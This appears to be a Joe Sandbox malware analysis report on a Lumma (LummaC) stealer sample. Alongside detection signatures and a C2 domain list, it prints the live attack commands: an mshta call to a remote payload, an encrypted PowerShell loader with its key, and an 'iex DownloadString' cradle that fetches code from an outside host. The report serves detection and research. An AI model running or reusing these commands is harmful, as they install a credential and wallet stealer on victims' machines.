Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report

Overview

General Information

Analysis ID:1579348
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
.NET source code contains potential unpacker
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
Yara detected MSILLoadEncryptedAssembly
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64native
  • cmd.exe (PID: 6992 cmdline: cmd /C ""C:\WINDOWS\system32\mshta.exe" https://savecoupons.shop/singl6.mp4" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 4448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • mshta.exe (PID: 2044 cmdline: "C:\WINDOWS\system32\mshta.exe" https://savecoupons.shop/singl6.mp4 MD5: 06B02D5C097C7DB1F109749C45F3F505)
      • powershell.exe (PID: 2576 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C343E27EEC5C4191D27011B33568FE6B0ECE385FE81FF1047B4CA5F5C3136955E90288D0CF771D4EDB3C9D787D81A22FA1D19D50DBC83BC87F1DCA44B36AD85C9385793AFD75CBEBC74C6D267B19EA7B471F3AA348B616B1DBAA4A77832B7A57A91B94748F0F93B2D08F4BC95283A1D6EF07728C7091AF8F56E69DE9EA56CA801CD0A7E62F5CDFAE51540ACFCB025D5E940A9075C8DA17758CDC6A94DC6B6D01EB23E488BA9A1371F56D19500FE2B8FB10BA9B54801012917F04D36326F74A108C2D0B9AD4FB51DA2F8BA2777F37564F5B6B6E926E7121E3462FF03AAE5966558C3283C1548AC5074916DB8A685025AD4BB17E389AAE7C4C89FE3D49A5B7CBB890755B7CBC935D1185DE2AFF91099EC236AF765EB3039E9561D484E095F1874255D784C682A4B088C008559D9426482954EA469C7570756');$BIAG=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((cDnCn('4C50475A727A72534D6D4F70764E7061')),[byte[]]::new(16)).TransformFinalBlock($Lhmk,0,$Lhmk.Length)); & $BIAG.Substring(0,3) $BIAG.Substring(129) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 4720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • powershell.exe (PID: 8336 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 8344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • powershell.exe (PID: 9160 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • chrome.exe (PID: 8056 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" MD5: BB7C48CDDDE076E7EB44022520F40F77)
              • chrome.exe (PID: 8052 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2736,i,10947443874826805229,13044788209452126445,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2744 /prefetch:3 MD5: BB7C48CDDDE076E7EB44022520F40F77)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["surmisehotte.click", "aspecteirs.lat", "energyaffai.lat", "crosshuaht.lat", "discokeyus.lat", "grannyejh.lat", "sustainskelet.lat", "rapeflowwj.lat", "necklacebudi.lat"], "Build id": "yJEcaG--singl6"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000006.00000002.57200410289.0000000008220000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: powershell.exe PID: 2576JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: powershell.exe PID: 2576INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0x29a3a:$b1: ::WriteAllBytes(
            • 0x2a3da:$b1: ::WriteAllBytes(
            • 0xcba27:$b1: ::WriteAllBytes(
            • 0xcbdcf:$b1: ::WriteAllBytes(
            • 0x1699:$s1: -join
            • 0x2557:$s1: -join
            • 0x1c931:$s1: -join
            • 0x1d687:$s1: -join
            • 0x29aed:$s1: -join
            • 0x2a48d:$s1: -join
            • 0x40c42:$s1: -join
            • 0x4d132:$s1: -join
            • 0x4dff0:$s1: -join
            • 0x519ee:$s1: -join
            • 0x710d0:$s1: -join
            • 0x71f8f:$s1: -join
            • 0x73cbc:$s1: -join
            • 0x75659:$s1: -join
            • 0x9d53a:$s1: -join
            • 0x9e48d:$s1: -join
            • 0x9f35c:$s1: -join
            Process Memory Space: powershell.exe PID: 8336JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              Click to see the 6 entries
              SourceRuleDescriptionAuthorStrings
              6.2.powershell.exe.8220000.2.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                SourceRuleDescriptionAuthorStrings
                amsi32_2576.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                  amsi32_8336.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D1272
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C343E27EEC5C4191D27011B33568FE6B0ECE385FE81FF1
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D1272
                    Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 9160, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", ProcessId: 8056, ProcessName: chrome.exe
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C343E27EEC5C4191D27011B33568FE6B0ECE385FE81FF1
